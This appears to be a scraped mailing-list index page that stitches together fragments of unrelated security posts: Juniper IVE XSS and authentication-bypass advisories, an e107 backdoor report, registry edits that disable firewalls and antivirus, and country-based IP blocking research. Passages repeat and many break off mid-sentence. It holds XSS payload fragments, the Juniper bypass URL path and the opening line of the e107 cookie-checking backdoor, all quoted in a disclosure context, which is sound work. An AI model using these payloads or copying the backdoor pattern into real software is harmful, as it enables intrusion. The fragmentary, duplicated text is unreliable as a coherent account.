| New User, Welcome! Login |
Next Page >>
I've
Thank you for your reply.
Firstly, it goes without saying that given time, effort and resources,
exploitation of any kind will eventually succeed. However, exploitation
via this vector, now becomes a mere "tic in a box" so to speak. The
whole experience is instant, requiring no effort whatsoever, on the very
next reboot these critical security services are disabled.
Hey!
I know it's been a while, but I've been busy etc. etc. :)
After 3 years, I've finally got around to a full release number! Here is
version 1.0a, in which I've started integrating Nick von Dadelszen's
libnfc (http://www.libnfc.org/) wrapper so we can support the new
generation of usb stick readers which are practically given away with
digital cash products such as Snapper
(http://www.snapper.co.nz/index.html). I've also done a lot of tidying
This reminded me of a bunch of problems I spotted in Juniper SSL VPN a
while ago; they are apparently fixed, but I don't recall seeing any
public vendor advisory / credit for reporting them - so here you go,
even if just for the record...
These were fixed by Juniper in IVE 6.3R1, 6.2R3, 6.1R5, 6.0R8, and 5.5
R7.1 over a year ago.
1) Auth bypass - IVE permitted just about any script on the box to be
invoked without authentication by going through a
/dana-na/download/?url= hop, for example:
I`ve just checked the archive. The latest version of the file class2.php was
changed on 2010/01/21 03:57:43 and it does not contain the malicious code.
It has been probably replaced already, or we are using different mirrors.
Valery Marchuk
www.SecurityLab.ru
----- Original Message -----
From: "Bogdan Calin" <bogdan@acunetix.com>
To: <full-disclosure@lists.grok.org.uk>
PR09-17: Juniper Secure Access series (Juniper IVE) authenticated XSS &
REDIRECTION
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-17
Vulnerability found: 12th October 2009
Vendor informed: 12 October 2009
Severity: Medium (Script injection)
*please* respond to the mailing list.
Use this code at your own risk. It could contain mistakes, cause
problems with other software, and fail to protect your computer.
I've done some very basic testing on the following configurations:
* Windows 2000 SP4, IE6 SP1
* Windows XP (x86) SP3, IE 6 SP3
* Windows XP (x86) SP3, IE 7
* Windows XP x64 SP1, IE 6 SP1 (32-bit and 64-bit)
PR09-16: Juniper Secure Access series (Juniper IVE) XSS
Vulnerability found: 12th October 2009
Severity: Medium (Script injection)
Description:
There is a Cross-site Scripting vulnerability on Juniper, IVE web interface.
such as '=' or '"' or others are specified.
It's not immediately obvious that this error is still exploitable, simple
tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
isn't helpful as the code isn't evaluated again. In situations like this, the
best course of action is to harass lcamtuf until he gives you the solution,
which of course his encyclopaedic knowledge of browser security quirks produced
immediately.
<script defer>code</script>
such as '=' or '"' or others are specified.
It's not immediately obvious that this error is still exploitable, simple
tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
isn't helpful as the code isn't evaluated again. In situations like this, the
best course of action is to harass lcamtuf until he gives you the solution,
which of course his encyclopaedic knowledge of browser security quirks produced
immediately.
<script defer>code</script>
Hi guys,
The latest version of e107, version 0.7.17 contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip
I've just downloaded this file and while looking through the code, I've
found the following piece of code:
file: class2.php, line: 1876
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
> such as '=' or '"' or others are specified.
>
> It's not immediately obvious that this error is still exploitable, simple
> tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
> isn't helpful as the code isn't evaluated again. In situations like this, the
> best course of action is to harass lcamtuf until he gives you the solution,
> which of course his encyclopaedic knowledge of browser security quirks produced
> immediately.
>
> <script defer>code</script>
>
Hi,
I've detailed below just how easy (too easy) it is to circumvent the security of the following critical security services. Thus can't now become can!
It goes without saying that malware on entering a system by whichever means, and on detecting critical security services, can now even more easily (automated/scripted) disarm critical security services, just by modifying unprotected registry entries, for whatever malevolent purposes.
I've created registry entries (I can send these to you should you be interested) to demonstrate just how easy it is to circumvent the security of these critical security services, which unfortunately is all too easily a very effective way of immobilising critical security functions i.e. firewall, antivirus etc. This in my opinion is certainly not a vulnerability nor a flaw so to speak, but rather a functional design oversight?
I've verified this against the following with success. After these registry modifications have been effected and the system rebooted, these critical services will be disarmed.
2. Install PHP 5.3.1
If you cannot disable file uploading on your website, it's recommended
to install the latest version of PHP.
PHP 5.3.1 includes a patch for this problem:
- Added "max_file_uploads" INI directive, which can be set to limit the
number of file uploads per-request to 20 by default, to prevent possible
DOS via temporary file exhaustion.
3. Install Suhosin PHP extension
The Suhosin PHP extension has an option named "suhosin.upload.max_uploads".
Recently, David Litchfield asked me to help him out a bit with a research project he was working on by having me set up a network capture in my DMZ to log SQL Slammer attacks. I don't publish any services here at my Santa Cruz facility (meaning there are no required inbound protocols and no references in DNS anywhere) so I figured it would be nice "quiet" circuit to use for testing. I basically port-forwarded UDP 1434 to a laptop in my DMZ running NetMon3 also filtering for UDP 1434. After about 4 days of running NetMon, I had captured almost 30 (verified) random SQL Slammer attacks. What I found interesting was that every single one of them was sourced in China (all from different addresses).
Now, it's not my intent to start some geopolitical debate here, but I've long heard about how some people would block entire countries at the border in order to obviate issues with malicious traffic. There are obviously some issues with this (both from a technical and potential customer standpoint) so I set out to do a bit of research on my own. First thing I found out was that if one does decide to block entire countries, that it's going to be a bit of work from a rule standpoint. Sure, if I wanted to block all of China I could block APNIC, but that would block WAY more than I would want. So I set about finding a good resource for country-by-country IP ranges. Fortunately, Wade Alcorn, one of my colleagues at NGSSoftware turned me on to one that seemed pretty decent (there are a few around, though). But finding the resource was just the beginning... The list I got included 234 countries, comprised by almost 100,000 records of IP ranges.
Making a firewall rule to block China, for instance, would require entering in almost 600 IP ranges - so the "manual" route was clearly out. The thing is, I just didn't want to block countries without more research, so I needed a way to gather some statistics first. Enter ISA Server - as many of you know, I'm a big fan of ISA - it's a true enterprise security product with great scripting capabilities, so I set to work creating an automated method by which to create computer sets in ISA for each country. Basically, I created a SQL database and loaded all the records into it - I then wrote a little COM app to reach out and grab the data by countries, create the sets in ISA, and loop through the different ranges of IP's to add them to the set. It worked great.
This accomplished two things - one, I now have full detailed computer sets for each country to do with as I please. Secondly, I have an excellent way of producing detailed reports for traffic analysis in ISA- this was key. With data collection points set up at different places around the world, I was able to capture 3.1 million inbound connection attempts. The results were quite interesting. While China still led with connection attempts overall, it was interesting to see that Canada was a close second. However, while China's traffic consisted of SQL Slammer, HTTP, SMTP, probes for GhostProxy, etc, almost all of Canada's traffic was MESSENGER spam (UDP 1026,1027,1208). The world leader for HTTP was Brazil, strangely enough. Now, all of this will change based on who and where you are, and the types of services being offered. For example, I only got 5 SMTP connection attempts to my cable modem in a week, but my ISP in BM got hundreds of thousands (understandably) in the same time period. I'll whip up some cool reports for what I found and post them once I get some more data in from different collection points, but the valuable outcome of the project was the creation of these individual country-by-country Computer Sets for ISA.
Beforehand, I had no real way of easily and effectively reporting on traffic patterns by source country. Whether you can or can't block entire countries is your business, but at least this affords someone an easy way of doing research. You may not be able to (or even want) to block HTTP from China, but you very well may want to block SMTP - with ISA and computer sets, you can easily do this. Even if you don't block anything at all, you can use the sets to get rich reports of what kind of traffic your are getting from a particular country. While the validity of the practice of blocking entire countries (or particular protocols for that matter) may be up for debate, you now at least have the option to make your own decision based on factual information - to be sure, you've always been able to do this obviously, it's just been my experience that maintaining rule lists by country/protocol has been quite difficult and time consuming.
I've exported every countries entire list to ISA 2006 .XML format, and have posted them on the HoG site for community use. Since I've automated the Set creation process, I'll be updating the sets each month or so to ensure that changes are processed correctly. I would like to thank NGSSoftware for purchasing the required business services to receive the updates - their donation makes it possible for me to give you updated sets for free.
As Gadi mentioned, there are a number of known issues that Apple has
yet to address. If the professional malware authors are now taking aim
at Mac users, Apple appears to be making it easy for them.
There are a few comments that I've seen in this thread that are rather
worrisome:
::: Interspace System Department
> Relax. MAC users are not that stupid as MS users...
Great overview, Todd!
I've just wanted to mention that MS downplayed the vulnerabilities I've
found in Vista's Sidebar gadgets.
In my blog post
(http://aviv.raffon.net/2007/08/16/VistaGadgetsGoneWild.aspx), I've
demonstrated a scenario where a worm can be propagated by exploiting the
vulnerability in the RSS feeds gadget.
I don't understand why Microsoft rated this vulnerability as important,
instead of critical.
On 2010-02-17 barkley@usa.net wrote:
> I've detailed below just how easy (too easy) it is to circumvent the
> security of the following critical security services. Thus can't now
> become can!
>
> It goes without saying that malware on entering a system by whichever
> means, and on detecting critical security services, can now even more
> easily (automated/scripted) disarm critical security services, just by
> modifying unprotected registry entries, for whatever malevolent
> purposes.
Hello all,
To cut the intro blablablas short, I've compiled this video here:
http://www.youtube.com/watch?v=NMhO00bnRzM
It's about abusing PHP's builtin PRNG functions to attack web applications.
It starts where Stefan Esser's wonderful article "mt_srand and not so random numbers" ( http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ ) ended.
as SSO automatically grants the hijacked session access to other systems
(e.g. typically used in combination with Outlook Web Access).
o AFFECTED SYSTEMS
Juniper SA appliances running Juniper IVE OS 6.0 or higher
o SOLUTION
Juniper released IVE updates 6.3R7, 6.4R5 and 6.5R2 which fix this issue.
The updates and installation instructions are available for Juniper
Hi Mustlive,
I'm not sure if there's a need to discuss or clarify this any further.
Please refer to my earlier posts, and for the sake of saving some of our
time & efforts, avoid drawing tangents about scripts and noscripts (I've
clarified both earlier) & weasel words (security vulnerability and nntp
exploit - irrelevent in this case).
JS or no-JS, this issue is nothing new, this behavior is well-defined and a
necessity and definitely not a URI (of any kind) exploit or a security
vulnerability.
Hi,
During my (in)security research, I've discovered what appears initially to be
a design oversight and not necessarily a vulnerability, affecting ZoneAlarm
and various other security vendors. I've tested this on various XP platforms
successfully, please feel free to notify the vendor as you wish and/or to
publish whatever you feel appropriate under the circumstances.
> The paper is available at:
>
> http://www.pomcor.com/whitepapers/file_sharing_security.pdf
>
> I have not been able to find much prior work.
> What I've found is discussed in Section 2 of the
> paper. If I've missed something, please let me
> know.
>
> Thanks,
>
The paper is available at:
http://www.pomcor.com/whitepapers/file_sharing_security.pdf
I have not been able to find much prior work.
What I've found is discussed in Section 2 of the
paper. If I've missed something, please let me
know.
Thanks,
> are essentially XSS attacks, but the usual
> http://www.pomcor.com/whitepapers/file_sharing_security.pdf
>
> I have not been able to find much prior work.
> What I've found is discussed in Section 2 of the
> paper. If I've missed something, please let me
> know.
The gist of your suggestion is to use different base URLs
for the untrusted content, so that "same origin" policies
different hostnames to protect against XSS:
See Brian Eaton's post to WebSecurity mailing list, May 18th, 2007,
titled "Re: [WEB SECURITY] How to avoid XSS into PDF Files, using java".
http://www.webappsec.org/lists/websecurity/archive/2007-05/msg00087.html
fcorella@pomcor.com wrote:
> Hello,
>
> I wanted to announce a Pomcor white paper that
have fixed it in Exchange 2007.
On Sat, Nov 15, 2008 at 5:33 AM, Piergiorgio Venuti
<piergiorgio@gigasec.org> wrote:
> Hi all,
> also I've found this vulnerability 1 year ago during a pt and work fine
> with url obfuscation. I've read that with owa 2007 this vulnerability is
> patched but I don't have tried yet.
>
> Best regards,
> Piergiorgio
Hi all,
also I've found this vulnerability 1 year ago during a pt and work fine
with url obfuscation. I've read that with owa 2007 this vulnerability is
patched but I don't have tried yet.
Best regards,
Piergiorgio
Giuseppe Gottardi ha scritto:
I verified that OWA 2007 is not vulnerable to the redirection attacks
described below.
Angelo Castigliola III
EISRM - Application Security Architecture
Unum
Telephone: 207-575-3820
Mobile: 207-590-3630
acastigliola@unum.com
>> for years and years, but all our attention was gave to the shellcode.
> Well, actually that's because the polymorphic code for viruses and worms
> came even before, and was already a beaten issue.
I didn't get this age (Virus Age), sorry. The last virus I've heart
about was the CHI. The last real virus, I presume. Right?
>> even during my research, when I talked to someone about the perspective of
>> having a real polymorphic code, people always got confused with polymorphic
>> shellcode.
Since I seem to have the curse of waiting too long to release research and then seeing it released by someone else, I've decided I'm going to release a couple hashes of an existing version of the presentation I've made on the topic while I iron it out with some peer review.
The research I'm doing deals with performing OS fingerprinting through application-level probing more advanced than simple banner grabbing. I will also give several examples with Apache HTTP server version 2.2.9, the latest at the time the paper was written. I expect these techniques should work on most versions of Apache, though I have not tested it.
The hashes are for a .ppt file, though I hope to have the research available as a whitepaper as well, in .pdf and .txt format.
I should be releasing it by the end of the month if all goes according to plan.
Thank you!
Next Page>>
|
|
|
